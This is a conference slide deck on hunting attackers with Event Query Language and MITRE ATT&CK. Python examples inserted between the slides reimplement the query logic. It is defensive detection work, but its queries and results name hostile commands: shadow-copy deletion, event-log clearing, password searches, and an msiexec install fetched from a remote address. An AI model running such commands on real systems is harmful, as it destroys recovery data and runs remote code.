The Hunter Games: How to Find the Adversary with Event Query Language

Circle City Con 2019 and BSides SATX 2019

Abstract:
How do you find malicious activity? We often fall back on the cliché "you know it when you see it", but how do you even see it without drowning in data? MITRE's ATT&CK knowledge base organizes adversary behavior into tactics and techniques, and orients our approach to endpoint data. It suggests questions that might be worth asking, but not a way to ask them. The Event Query Language (EQL) allows a security analyst to naturally express queries for IOC search, hunting, and behavioral detections, while remaining platform- and data-source-agnostic.

In this talk, I will demonstrate the iterative process of establishing situational awareness in your environment, creating targeted detections, and hunting for the adversary in your environment with real data, queries, and results.

  1. THE HUNTER GAMES: How to find the adversary with Event Query Language. Ross Wolf, ENDGAME
  2. chmod +rw bio
      Ross Wolf, @rw_access, Threat Researcher at Endgame
      - Develop detection frameworks and individual detections
      - Developed Event Query Language
      - Experience red- and blue-teaming
  3. EXAMPLE REPORT (WOLF)
  4. NOW WHAT?
  5. TALK OVERVIEW
      • Developing threat-based detections with ATT&CK and your data
      • Crash course through Event Query Language
      • Follow the trail of a generic threat actor, writing detections for each step
      • Explore threat hunting methods to find the known unknown
      • Contribute back to the community
  6. 01: THREAT BASED DETECTION
  7. DETECTION PROCESS
      • Use ATT&CK to identify common behaviors, instead of just tools
      • Explore the mind of the attacker
      • Understand your data and visibility
      • Express detection logic for your platform
      • Continuously create, test, and refine analytics
        • Atomic Red Team, CALDERA, Red Team Automation, etc.
        • Evaluate against human red teams
      • Don't be afraid to retire analytics!
      https://www.mitre.org/publications/technical-papers/finding-cyber-threats-with-attck-based-analytics
  8. ATTACKER TRADECRAFT
      • Gain access to establish the initial foothold
      • Discover information about the endpoint
      • Persist to survive system reboots
      • Establish command and control (C2)
      • Gain additional privileges and credentials
      • Move between hosts and execute commands
      • Collect and exfiltrate sensitive information
      • Destroy data or negatively impact the mission
      • All while evading monitoring and protections
      ATT&CK Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact
  9. MITRE ATT&CK™ FRAMEWORK
      • Knowledge base that organizes behaviors (techniques) by objectives (tactics)
      • Most techniques are used by multiple groups and red teams
      • Hundreds of references to threat reports
  10. ATT&CK TECHNIQUE: https://attack.mitre.org/techniques/T1193/
  11. KNOW YOUR DATA
      • Data originally gathered from Sysmon
      • Converted to a common schema
      • file, process, network, and registry event monitoring
      https://eqllib.readthedocs.io/en/latest/schemas.html
      Example process event:
        command_line         C:\Windows\Explorer.EXE
        md5                  ac4c51eb24aa95b77f705ab159189e24
        parent_process_name  userinit.exe
        parent_process_path  C:\Windows\system32\userinit.exe
        pid                  2460
        ppid                 3052
        process_name         explorer.exe
        process_path         C:\Windows\explorer.exe
        subtype              create
        timestamp            131485997150000000
        user_domain          research
        user_name            researcher
  12. INTRO TO EQL
      • Event Query Language is simple and concise
      • Schema-independent and OS-agnostic
      • Designed for real-time detection with stream processing
      • Supports multi-event behaviors, stacking and sifting through data
      • Function syntax instead of keyword explosion (e.g. length(field))
  13. SIMPLE QUERIES
      • Boolean and comparison logic: and, or, not, <, <=, ==, !=, >=, >
      • Wildcard matching with the * character
      • String comparisons are case-insensitive
        process where process_name == "svchost.exe" and
          (command_line != "* -k *" or parent_process_name != "services.exe")
      https://eql.readthedocs.io/en/latest/query-guide
  14. SEQUENCES
      • Multi-event behaviors with ordering
      • Match properties between events with the by syntax
      • Time limits: maxspan=1h
      • Sequences can be expired with an until condition
        sequence with maxspan=5m
          [file where file_name == "*.exe"] by user_name, file_path
          [process where true] by user_name, process_path
  15. JOINS
      • Match the events specified, without time limits
      • Supports by and until syntax for additional matching or state
      • Unlike SQL, it finds adjacent pairs instead of cross-products
        join
          [file where file_path == "*\System32\Tasks\h4x0r.xml"]
          [registry where registry_path == "*\runonce\h4xor"]
  16. JOINS
        join by source_ip, destination_ip
          [network where destination_port == 3389] // RDP
          [network where destination_port == 135]  // RPC
          [network where destination_port == 445]  // SMB
  17. PIPES AND OUTLIERS
      • Pipes can be used to transform or reduce output
      • Combine in various ways to perform stacking or reduce the data set
      • count, filter, head, sort, tail, unique, unique_count
        process where true
        // Remove duplicate pairs
        | unique process_name, command_line
        // Count per process_name to get the number of unique commands
        | count process_name
        | filter count < 5
  18. PROCESS LINEAGE
      • Natively tracks process lineage by monitoring create/terminate events
      • Supports descendant of, child of, and event of
      • Combine with other boolean logic
        network where process_name == "powershell.exe" and
          not descendant of [process where process_name == "explorer.exe"]
  19. PROCESS LINEAGE
        file where file_name == "*.exe" and
          event of [process where child of [process where process_name == "powershell.exe"]]
  20. 02: DETECT KNOWN BEHAVIORS
  21. APPROACH TO DETECTION
      • Understand common tactics employed by the adversary
      • Next, move to specific methods or techniques
      • From there we can craft detection logic
      • When necessary, understand operating system internals
      Tactics: Initial Access, Execution, Persistence, Privilege Escalation, Command and Control, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Impact
  22. INITIAL ACCESS & EXECUTION
      • Technique: Spearphishing Attachment (T1193), PowerShell (T1086)
      • Detection: Scriptable child processes of Office products - PowerShell, VB script, cmd.exe
        process where parent_process_name in ("winword.exe", "excel.exe", "powerpnt.exe") and
          process_name in ("powershell.exe", "cscript.exe", "wscript.exe", "cmd.exe")
  23. INITIAL ACCESS & EXECUTION
      • Technique: Spearphishing Attachment (T1193)
      • Detection: Office creating a PE file that quickly executes
        sequence with maxspan=5m
          [file where file_name == "*.exe" and
             process_name in ("winword.exe", "excel.exe", "powerpnt.exe")] by file_path
          [process where true] by process_path
  24. PERSISTENCE & PRIVILEGE ESCALATION
      • Technique: Scheduled Task (T1053)
      • Detection: The API is cumbersome, so many tools directly execute schtasks.exe. Look for non-SYSTEM users creating tasks that run as SYSTEM
        process where process_name == "schtasks.exe" and user_name != "SYSTEM" and
          (command_line == "* /ru system" or command_line == '* /ru "nt authority"')
        | unique user_name, command_line
  25. COMMAND AND CONTROL (C2)
      • Technique: Uncommonly Used Port (T1065)
        network where not destination_port in (
          1,3,4,6,7,9,13,17,19,20,21,22,23,24,25,26,30,32,33,37,42,43,
          49,53,70,79,80,81,82,83,84,85,88,89,90,99,100,106,109,110,111,
          113,119,125,135,139,143,144,146,161,163,179,199,211,212,222,
          254,255,256,259,264,280,301,306, /* many more? */)
        | unique destination_address, destination_port
  26. COMMAND AND CONTROL (C2)
      • Technique: Outgoing Connection from Abusable Process (T???)
      • Detection: Look for network activity from abusable binaries; continuously tune to your environment
        sequence by pid
          [process where subtype.create]
          [network where process_name in ( // known LOLBINS
              "powershell.exe", "mshta.exe", "installutil.exe", "msxsl.exe", "rundll32.exe")]
        | unique events[0].process_path, events[1].destination_address, events[1].destination_port
  27. DEFENSE EVASION
      • Technique: Masquerading (T1096)
      • Detection: Look for executables matching the names of known Windows binaries from system32, but in the wrong directory
        process where process_name in (
            "csrss.exe", "dllhost.exe", "lsass.exe", "lsm.exe", "services.exe", "winlogon.exe", /* etc */ )
          and not process_path == "C:\windows\system32\*"
      https://www.endgame.com/blog/how-hunt-masquerade-ball
  28. DEFENSE EVASION
      • Technique: Process Injection (T1096), Process Hollowing (T1093)
      • Detection: Look for process creations from the wrong parent
        process where
          (process_name == "lsass.exe" and parent_process_name != "wininit.exe") or
          (process_name == "LogonUI.exe" and not parent_process_name in ("winlogon.exe", "wininit.exe")) or
          (process_name == "services.exe" and parent_process_name != "wininit.exe") or
          (process_name == "svchost.exe" and parent_process_name != "services.exe" and
            // the system32\svchost.exe executes syswow64\svchost.exe for 32-bit DLLs
            not (parent_process_path == "*\system32\svchost.exe" and process_path == "*\syswow64\svchost.exe"))
  29. CREDENTIAL ACCESS
      • Technique: Access Sensitive Data or Credentials in Files (T1087)
      • Detection: Look for commands that search for "password"
        process where process_name == "findstr.exe" and command_line == "*password*"
        | unique parent_process_name, command_line
  30. DISCOVERY
      • Technique: Account Discovery (T1087), Remote System Discovery (T1096), System Account Discovery (T1033)
      • Detection: Look for any user that runs multiple different types of discovery commands
        join by user_name
          [process where process_name in ("ipconfig.exe", "hostname.exe", "whoami.exe")]
          [process where process_name == "net.exe" and (command_line == "*group*" or command_line == "* user*")]
          [process where process_name in ("tasklist.exe", "qprocess.exe", "sc.exe")]
        | unique user_name
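As an added example (not code from the talk or from the eql package), here is the join behavior described on slides 15, 16 and 30 written out in plain Python: each [ ... ] branch becomes a predicate, the by key a function, and the slide-30 discovery join is run over constructed process events. Assumed: each branch slot keeps the newest pending event per key, and a completed match consumes all slots, which is what yields adjacent pairs instead of a cross-product.

```python
from collections import defaultdict
from fnmatch import fnmatchcase

def like(value, pattern):
    """EQL-style wildcard compare: case-insensitive, '*' matches any run."""
    return fnmatchcase(str(value).lower(), pattern.lower())

def match_join(events, branches, key_fn):
    """branches: one predicate per [ ... ] block of the join, in any order.
    key_fn: the shared `by` key. Returns matched event tuples in branch order.
    Each branch holds one pending event per key and a completed match consumes
    all of them, so repeated whoami runs cannot multiply the result set."""
    pending = defaultdict(dict)  # join key -> {branch index: newest event}
    results = []
    for ev in events:
        key = key_fn(ev)
        for i, pred in enumerate(branches):
            if pred(ev):
                pending[key][i] = ev  # assumption: the newest pending event wins
        if len(pending[key]) == len(branches):
            results.append(tuple(pending[key][i] for i in range(len(branches))))
            del pending[key]  # slots consumed: no cross product
    return results

def _proc(ts, user, name, cmd):  # constructed process-create event, not real telemetry
    return {"timestamp": ts, "event_type": "process", "user_name": user,
            "process_name": name, "command_line": cmd}

SAMPLE = [
    _proc(1, "alice", "whoami.exe", "whoami"),
    _proc(2, "bob", "whoami.exe", "whoami /all"),
    _proc(3, "alice", "net.exe", "net user"),
    _proc(4, "alice", "whoami.exe", "whoami /groups"),
    _proc(5, "alice", "tasklist.exe", "tasklist /svc"),    # completes alice's join
    _proc(6, "bob", "tasklist.exe", "tasklist"),            # bob never ran net.exe
    _proc(7, "svc", "net.exe", 'net group "Domain Admins" /domain'),
    _proc(8, "svc", "hostname.exe", "hostname"),
    _proc(9, "svc", "sc.exe", "sc query"),                  # completes svc's join
    _proc(10, "alice", "tasklist.exe", "tasklist"),         # slots consumed: no new match
]

def discovery_join(events):
    """Slide 30: join by user_name over host, account and process/service discovery."""
    proc = lambda e: e["event_type"] == "process"
    branches = [
        lambda e: proc(e) and e["process_name"].lower() in ("ipconfig.exe", "hostname.exe", "whoami.exe"),
        lambda e: proc(e) and e["process_name"].lower() == "net.exe"
                  and (like(e["command_line"], "*group*") or like(e["command_line"], "* user*")),
        lambda e: proc(e) and e["process_name"].lower() in ("tasklist.exe", "qprocess.exe", "sc.exe"),
    ]
    return match_join(events, branches, lambda e: e["user_name"].lower())

def users_running_multi_discovery(events):
    """The trailing `| unique user_name`: one row per user, first match wins."""
    users = []
    for match in discovery_join(events):
        if match[0]["user_name"] not in users:
            users.append(match[0]["user_name"])
    return users
```

Note that alice ran whoami twice and tasklist twice, but the join reports her once; a SQL-style join over the same rows would return four combinations.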
  31. LATERAL MOVEMENT
      • Technique: Windows Remote Management (T1028), PowerShell (T1086)
      • Approach: Look for incoming WinRM connections followed by execution of the provider
        sequence with maxspan=2s
          [network where destination_port in (5985, 5986) and process_name == "svchost.exe"]
          [process where process_name == "wsmprovhost.exe" and command_line == "*embedding*"]
        | unique events[0].source_address, events[0].destination_address, events[1].user_name
  32. COLLECTION & EXFILTRATION
      • Technique: Data Staged (T1074), Data Compressed (T1072), Data Encrypted (T1022)
      • Detection: Look for known command lines of tools that indicate compression and encryption
        sequence by unique_pid with maxspan=5m
          [process where command_line == "* -hp*" or command_line == "* /hp*"]
          [file where file_name == "*.rar"]
        | unique events[0].process_path, events[1].file_name
  33. IMPACT
      • Technique: Inhibit System Recovery (T1490)
      • Detection: Monitor known command lines
        process where
          (process_name == "vssadmin.exe" and command_line == "*delete*") or
          (process_name == "wmic.exe" and command_line == "*shadow*delete*") or
          (process_name == "wevtutil.exe" and command_line == "* cl *")
  34. 03: HUNTING FOR THE UNKNOWN
  35. FUTURE THREAT REPORT
  36. FUTURE THREAT REPORT
  37. APPROACHES
      • We want to look proactively for evidence of an adversary
      • Often technique-agnostic, but still follow the attacker lifecycle
      • Ask environment-oriented questions
      • Establish situational awareness and track deviations
        • Prevalence
        • Recency
        • Patterns
      is this threat hunting?
  38. UNUSUAL PARENT-CHILD RELATIONSHIPS
      What parent-child process relationships are rare and recent?
        process where subtype.create
        | unique_count parent_process_name, process_name
        | tail 100
        | sort count
        | head 10
      Results (parent_process_name, command_line):
        MSI9BBF.tmp                      "C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe" -u auto-update
        powershell.exe                   rundll32.exe C:\Users\vagrant\AppData\Local\cyzfc.dat, PointFunctionCall
        wuauclt.exe                      "C:\WINDOWS\SoftwareDistribution\Download\Install\AM_Delta_Patch_1.293.2420.0.exe" WD /q
        AM_Delta_Patch_1.293.2420.0.exe  C:\WINDOWS\system32\MpSigStub.exe /stub 1.1.1 ...
  39. UNUSUAL PARENT-CHILD RELATIONSHIPS
      What parent-child process relationships are rare and recent?
        process where subtype.create and (
            process_name in ("cmd.exe", "powershell.exe") or
            parent_process_name in ("cmd.exe", "powershell.exe"))
        | unique_count parent_process_name, process_name
        | tail 100
        | sort count
        | head 10
      Results (parent_process_name, command_line):
        powershell.exe  rundll32.exe C:\Users\vagrant\AppData\Local\cyzfc.dat, PointFunctionCall
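Added example, not from the talk or the eql package: the pipes listed on slide 17 as plain Python list functions, followed by the slide-38 stacking hunt (rare and recent parent-child pairs) and the slide-17 pipeline run over constructed process events. The row shape for count (a key tuple plus a count) and the sample command lines are this example's own.

```python
from collections import Counter, OrderedDict

def _key(event, fields):
    # EQL compares strings case-insensitively; a missing field is null
    return tuple(None if event.get(f) is None else str(event[f]).lower() for f in fields)

def unique(events, *fields):
    """`unique f1, f2`: keep the first event seen for each distinct key."""
    seen, out = set(), []
    for e in events:
        k = _key(e, fields)
        if k not in seen:
            seen.add(k)
            out.append(e)
    return out

def unique_count(events, *fields):
    """`unique_count f1, f2`: like unique, but each kept event carries a count."""
    first, counts = OrderedDict(), Counter()
    for e in events:
        k = _key(e, fields)
        first.setdefault(k, e)
        counts[k] += 1
    return [dict(e, count=counts[k]) for k, e in first.items()]

def count(events, *fields):
    """`count f1`: one row per distinct key with its total; bare `count` totals all."""
    if not fields:
        return [{"count": len(events)}]
    rows = unique_count(events, *fields)
    return [{"key": tuple(r.get(f) for f in fields), "count": r["count"]} for r in rows]

def filter_rows(events, predicate):
    """`filter <condition>`: drop rows for which the condition is false."""
    return [e for e in events if predicate(e)]

def sort(events, field):
    """`sort field`: ascending and stable, so ties keep first-seen order."""
    return sorted(events, key=lambda e: e[field])

def head(events, n):
    return events[:n]

def tail(events, n):
    return events[-n:] if n else []

def _ev(parent, name, cmd):  # constructed process-create event, not real telemetry
    return {"parent_process_name": parent, "process_name": name, "command_line": cmd}

SAMPLE = (  # oldest first; the last two pairs are the rare and recent ones
    [_ev("services.exe", "svchost.exe", "svchost.exe -k netsvcs -s Svc%d" % i) for i in range(5)]
    + [_ev("explorer.exe", "chrome.exe", "chrome.exe --profile-directory=P%d" % i) for i in range(3)]
    + [_ev("powershell.exe", "rundll32.exe",
           r"rundll32.exe C:\Users\vagrant\AppData\Local\cyzfc.dat, PointFunctionCall"),
       _ev("explorer.exe", "notepad.exe", "notepad.exe notes.txt")]
)

def rare_recent_parent_child(events, recent=100, top=10):
    """Slide 38: unique_count parent_process_name, process_name | tail N | sort count | head M."""
    rows = unique_count(events, "parent_process_name", "process_name")
    return head(sort(tail(rows, recent), "count"), top)

def processes_with_few_commands(events, limit=5):
    """Slide 17: unique process_name, command_line | count process_name | filter count < limit."""
    rows = count(unique(events, "process_name", "command_line"), "process_name")
    return filter_rows(rows, lambda r: r["count"] < limit)
```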
  40. REMOTE ACCESS TOOLS
      What recently first-seen processes also made network connections?
        join by process_path
          [process where subtype.create]
          [network where true]
        | unique events[0].process_path
        | tail 50
      Results (process_name, command_line):
        InstallUtil.exe      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=False /U mydotnet.exe
        OneDriveSetup.exe    "C:\Users\developer\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
        OfficeClickToRun.exe "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\Updates\16.0.11601.20230\OfficeClickToRun.exe" /update
      i'm in
  41. SUDDEN EXTROVERTS
      What processes have been seen before, but only recently made network activity?
        sequence by process_path
          [process where timestamp_utc < "2019-05-01"]
          [network where timestamp_utc > "2019-05-17"]
        until [network where timestamp_utc < "2019-05-17"]
        | unique process_path
      Result (command_line):
        msiexec.exe /quiet /i http://172.31.27.16:8000/bin/Installer.msi
  42. FILE SYSTEM WEAKNESSES
      What privileged files were modified by a user but executed as SYSTEM?
        sequence
          [file where subtype.create and file_name == "*.exe" and user_name != "SYSTEM"] by file_path
          [process where user_name == "SYSTEM"] by process_path
        | unique events[0].file_path
      Results (user_name, process_name, file_path):
        vagrant  jusched.exe     C:\Windows\system32\inf\svchost.exe
        zoom     CptInstall.exe  C:\Program Files (x86)\Common Files\Zoom\Support\CptService.exe
  43. REMOTE RECONNAISSANCE
      What enumeration commands were executed from processes with outgoing network activity?
        process where process_name in (
            "whoami.exe", "hostname.exe", "ipconfig.exe", "net.exe", "netstat.exe", "tasklist.exe")
          and child of [network where subtype.outgoing]
        | unique parent_process_path, process_name
        | unique_count parent_process_path
      Results (command_line, process_name, count):
        whoami.exe    powershell_ise.exe  1
        hostname.exe  dxdiag0732.exe      1
        netstat.exe   python.exe          1
      *slaps eql* this hunt can find so many recon commands
  44. BRUTE FORCE ATTEMPTS
      Are there multiple logon failures and eventually a success from a remote host?
        sequence by ip_address with maxspan=1h
          [security where event_id == 4625 and logon_type in (3,5,10)]
          [security where event_id == 4625 and logon_type in (3,5,10)]
          [security where event_id == 4625 and logon_type in (3,5,10)]
          [security where event_id == 4625 and logon_type in (3,5,10)]
          [security where event_id == 4624 and logon_type in (3,5,10)]
        until [security where event_id == 4624]
        // 4624 = success, 4625 = failure
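Added example (not the talk's or the eql package's code): a small sequence matcher with per-stage by keys, maxspan and until, covering the slide-14 syntax, the Office-drops-a-PE detection of slide 23 and the brute-force chain of slide 44, run over constructed events whose timestamps are seconds. Assumed: stage transitions are evaluated before the until condition, so the final 4624 completes a chain before until expires that address's partial state.

```python
from collections import defaultdict
from fnmatch import fnmatchcase

def like(value, pattern):
    """EQL-style string compare: case-insensitive, '*' matches any run."""
    return fnmatchcase(str(value).lower(), pattern.lower())

def match_sequence(events, stages, maxspan, until=None):
    """events: dicts with a numeric 'timestamp' (seconds), oldest first.
    stages: ordered (predicate, join_key_fn) pairs; until: optional such pair.
    Returns each completed sequence as the list of its events."""
    partial = defaultdict(dict)  # stage index -> {join key: events so far}
    results = []
    for ev in events:
        # Last stage first, so one event cannot start and advance the same chain.
        for i in range(len(stages) - 1, -1, -1):
            pred, key_fn = stages[i]
            if not pred(ev):
                continue
            key = key_fn(ev)
            if i == 0:
                partial[0][key] = [ev]  # a newer candidate replaces an older one
                continue
            prev = partial[i - 1].pop(key, None)
            if prev is None or ev["timestamp"] - prev[0]["timestamp"] > maxspan:
                continue  # nothing to extend, or maxspan exceeded: chain dropped
            if i == len(stages) - 1:
                results.append(prev + [ev])
            else:
                partial[i][key] = prev + [ev]
        if until is not None and until[0](ev):
            for stage in partial.values():
                stage.pop(until[1](ev), None)  # expire every chain for this key
    return results

# Slide 23: Office writes a PE that runs within 5 minutes, joined on file_path
# and then process_path. Constructed sample events, not real telemetry.
OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
SAMPLE = [
    {"event_type": "file", "timestamp": 100, "process_name": "WINWORD.EXE",
     "file_name": "inv.exe", "file_path": r"C:\Users\u\AppData\Local\Temp\inv.exe"},
    {"event_type": "process", "timestamp": 160, "process_name": "inv.exe",
     "process_path": r"C:\Users\u\AppData\Local\Temp\inv.exe"},
    {"event_type": "file", "timestamp": 200, "process_name": "excel.exe",
     "file_name": "slow.exe", "file_path": r"C:\Temp\slow.exe"},
    {"event_type": "process", "timestamp": 900, "process_name": "slow.exe",
     "process_path": r"C:\Temp\slow.exe"},  # 700 s later: outside maxspan
]

def office_drops_and_runs_pe(events, maxspan=300):
    stages = [
        (lambda e: e["event_type"] == "file" and like(e["file_name"], "*.exe")
         and e["process_name"].lower() in OFFICE, lambda e: e["file_path"].lower()),
        (lambda e: e["event_type"] == "process", lambda e: e["process_path"].lower()),
    ]
    return match_sequence(events, stages, maxspan)

# Slide 44: four remote logon failures (4625) then a success (4624) from one
# ip_address within an hour; any other 4624 for that address expires the chain.
def brute_force_then_success(events, failures=4, maxspan=3600):
    by_ip = lambda e: e["ip_address"]
    stage = lambda eid: (lambda e: e["event_id"] == eid and e["logon_type"] in (3, 5, 10), by_ip)
    return match_sequence(events, [stage(4625)] * failures + [stage(4624)], maxspan,
                          until=(lambda e: e["event_id"] == 4624, by_ip))
```

The slide-14 form with a sequence-wide by clause is the same machinery with every stage using one key function.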
  45. WHYMI HERE?
      What commands were spawned from WMI remotely or as a different user?
        process where subtype.create
        | unique authentication_id
        | filter not user_name in ("SYSTEM", "NT AUTHORITY", "LOCAL SERVICE") and
            (process_name == "wmiprvse.exe" or parent_process_name == "wmiprvse.exe")
        | unique process_name
      Results (command_line):
        cmd /c "tasklist /svc > %SystemRoot%\TEMP\nessus_task_listIVC4798D.TMP & ren %SystemRoot%\TEMP\nessus_task_listIVC4798D.TMP nessus_task_listIVC4798D.TXT"
        recdiscm32.exe \\10.1.2.3\admin$\system32\taskchg16.exe
  46. SUSPICIOUS LATERAL MOVEMENT
      What endpoints remotely connected via SMB and RPC to potentially upload and execute?
        sequence by destination_address with maxspan=30s
          [network where subtype.incoming and destination_port == 445]
          [network where subtype.incoming and destination_port == 135]
        | unique source_address
      • Noisy on domain controllers
      • Incoming traffic to workstations is suspicious
  47. 04: EQL COMMUNITY
  48. DOWNLOAD EQL
      • Install the Python package (supports 2.7, 3.4+) with pip install eql
      • Built-in CLI: eql query, with stdin/stdout redirection
      • Read the Getting Started blog post for more information
        • endgame.com/blog/technical-blog/getting-started-eql
  49. DEMO
  50. ANALYTICS LIBRARY
      • Browse the analytics library
        • eqllib.readthedocs.io
      • Contribute your detection and hunting logic
        • github.com/endgameinc/eqllib
      • 45+ analytics mapped to MITRE ATT&CK with contributions from Endgame and Red Canary
      • Multiple data sets to get your hands dirty
        • github.com/endgameinc/eqllib/tree/master/data
  51. ANALYTICS LIBRARY
  52. NORMALIZATION
      • Contribute schema mappings
      • Currently maps to Microsoft Sysmon and the MITRE Cyber Analytics Repository
      • Convert queries to mapped data sources
        $ eqllib convert-query -s "Microsoft Sysmon" 'process where subtype.create and process_name == "mshta.exe" and command_line == "* c:\programdata\*.hta"'
        process where EventId == 1 and Image == "*\mshta.exe" and CommandLine == "* c:\programdata\*.hta"
      • Normalize from mapped data sources to a sharable format
  53. WHAT'S NEXT?
      • Early June update to EQL 0.7
        • Contains schema validation with better error checking
        • Cleaner Python API for integrating with other projects
      • Summer release of 75+ atomic analytics mapped to ATT&CK
  54. GET IN TOUCH
      • Follow EQL on Twitter: @eventquerylang
      • Chat on Gitter: gitter.im/eventquerylang/community
      • Email us: eql AT endgame.com
  55. RESOURCES
      • Getting started with EQL (blog): endgame.com/blog/technical-blog/getting-started-eql
      • Endgame Guide to Threat Hunting (PDF): pages.endgame.com/wc-guide-to-threat-hunting.html
      • Follow the guide for creating sophisticated queries: eql.readthedocs.io/query-guide
      • Documentation: eql.readthedocs.io
      • Clone it! github.com/endgameinc/eql and github.com/endgameinc/eqllib
  56. THANK YOU. www.endgame.com, @ENDGAMEINC
